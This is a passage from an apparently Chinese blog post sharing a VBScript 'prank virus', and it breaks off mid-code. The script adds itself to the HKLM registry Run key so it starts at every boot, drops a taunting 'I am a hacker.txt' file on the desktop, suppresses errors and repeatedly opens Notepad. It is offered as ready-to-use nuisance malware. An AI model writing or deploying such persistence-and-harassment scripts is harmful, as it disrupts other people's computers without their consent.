vbs整人小病毒2

海螺,大家好!

这是我第二次发文章,点个赞再走吧!(✪ω✪)   Thanks♪(・ω・)ノ

(还有关注!)

好!直接上代码:

Dim AutoRunProgram     
Set AutoRunProgram = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"  
Type_Name = "REG_SZ"   
Key_Name = "game"   
Key_data = "    .vbs" 空白里头填文件路径
AutorunProgram.RegWrite regpath&Key_Name,Key_data,Type_Name   
dim fso,testfile
set fso = createobject("scripting.filesystemobject")  
set testfile = fso.createtextfile("       \I am a hacker.txt",true)空白里头填桌面路径
testfile.writeline("HaHa,Can't turn it off?")
testfile.close
on error resume next
on error resume next
dim wsh,ye
set wsh = createobject("wscript.shell")
wsh.run "notepad"
for i=1 to 25
wsh.appactivate("I am a hacker.t
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值